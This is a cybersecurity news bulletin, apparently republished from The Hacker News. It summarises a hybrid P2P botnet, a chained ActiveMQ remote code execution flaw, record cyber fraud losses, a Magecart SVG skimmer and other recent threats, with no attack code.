ThreatsDay Bulletin: Hybrid P2P Botnet Surges, 13-Year-Old Apache RCE Exploited, and Record $17.7 Billion Cyber Fraud Losses
In the ever-evolving landscape of cybersecurity, recent developments highlight a troubling trend: the resurgence of old vulnerabilities and the emergence of sophisticated cyber threats that exploit trusted platforms. This week, the cybersecurity community is grappling with a range of incidents, from a resilient hybrid botnet to alarming statistics on cyber fraud losses.
Resilient Hybrid Botnet Surge
A new variant of the Phorpiex botnet, also known as Trik, has been identified utilizing a hybrid communication model that merges traditional command-and-control (C2) HTTP polling with a peer-to-peer (P2P) protocol. This approach allows the botnet to maintain operational continuity even in the face of server takedowns. The Phorpiex Twizt variant primarily aims to deploy a clipper that reroutes cryptocurrency transactions, while also distributing high-volume sextortion email spam and facilitating ransomware deployment, including variants like LockBit Black.
According to Bitsight, the Phorpiex botnet has shown a remarkable ability to adapt, evolving from a simple spam operation into a sophisticated platform. Currently, it is responsible for approximately 125,000 infections daily, with the most affected regions being Iran, Uzbekistan, China, Kazakhstan, and Pakistan.
Chained Flaws Enable Stealth RCE
In a significant security revelation, a remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, which has persisted for 13 years, can be exploited in conjunction with an older flaw (CVE-2024-32114) to bypass authentication. This newly identified vulnerability, tracked as CVE-2026-34197, allows attackers to invoke management operations through the Jolokia API, tricking the message broker into executing remote commands.
Horizon3.ai researchers have noted that while the vulnerability typically requires credentials, default credentials are common in many environments, making it easier for attackers to exploit. In certain versions, no credentials are necessary due to another vulnerability that exposes the Jolokia API without authentication. This flaw has been addressed in ActiveMQ Classic versions 5.19.4 and 6.2.3.
Cyber Fraud Losses Hit Record Highs
The financial impact of cyber-enabled fraud continues to escalate, with victims reporting losses exceeding $17.7 billion in 2025 alone. This figure represents a staggering 26% increase from the previous year, with cyber-enabled fraud accounting for nearly 85% of all losses reported to the Internet Crime Complaint Center (IC3). Cryptocurrency investment fraud emerged as the leading source of financial losses, with $7.2 billion reported.
Investment scams overall led to $8.6 billion in losses, followed by business email compromise and tech support scams. The rise of ransomware variants has also contributed to significant financial damage, with 63 new variants identified last year, resulting in over $32 million in losses.
AI-Driven DDoS Tactics Escalate
Data from NETSCOUT reveals that over 8 million DDoS attacks were recorded across 203 countries and territories between July and December 2025. While the overall attack count remained stable, the sophistication of these attacks has dramatically increased. The emergence of the TurboMirai class of IoT botnets, including AISURU and Eleven11, has raised concerns, as DDoS-for-hire platforms now integrate dark-web large language models (LLMs) and conversational AI. This trend lowers the technical barrier for launching complex, multi-vector attacks, allowing even unskilled threat actors to orchestrate sophisticated campaigns.
Insider Breach Exposes Private Photos
A former employee of Meta in the U.K. is under investigation for allegedly downloading approximately 30,000 private photos from Facebook. The accused reportedly developed a software program to evade internal security systems and access users’ private images. Meta discovered the breach over a year ago, terminated the employee, and referred the case to law enforcement. The company has also notified affected users, although the exact number remains unclear.
Help Desk Attacks Enable Enterprise Breaches
Google is currently tracking a financially motivated threat cluster known as UNC6783, linked to the “Raccoon” persona. This group targets high-profile organizations by compromising business process outsourcing (BPO) providers and help desk staff for data extortion. The campaign employs live chat social engineering tactics to direct employees to spoofed Okta logins, utilizing domains that mimic legitimate support channels.
Organizations are advised to prioritize FIDO2 hardware keys for high-risk roles, monitor live chat for suspicious links, and regularly audit newly enrolled multi-factor authentication (MFA) devices.
Magecart Skimmer Hides in SVG
A large-scale Magecart campaign has been detected using invisible 1×1 pixel SVG elements to inject a fake checkout overlay on 99 Magento e-commerce stores. This skimmer exfiltrates payment data to six attacker-controlled domains. The likely entry vector for this attack is the PolyShell vulnerability, which continues to affect unprotected Magento stores. The skimmer displays a convincing “Secure Checkout” overlay, capturing payment details before redirecting users to the legitimate checkout page.
Linux SMB Flaw Leaks Crypto Keys
A high-severity vulnerability has been disclosed in the Linux kernel’s ksmbd SMB3 server, tracked as CVE-2026-23226. This flaw allows attackers to leak the per-channel AES-128-CMAC signing key used to sign all SMB3 traffic, potentially enabling them to forge signatures and impersonate the server. The vulnerability has been addressed in a recent patch.
Conclusion
The cybersecurity landscape is witnessing a confluence of old vulnerabilities being exploited in new ways, alongside the emergence of sophisticated threats leveraging trusted platforms. Organizations must remain vigilant, patch vulnerabilities, and audit their security measures to mitigate risks effectively.
For further insights into the latest cybersecurity developments, threat intelligence, and breaking updates from across the Middle East.
Source: thehackernews.com
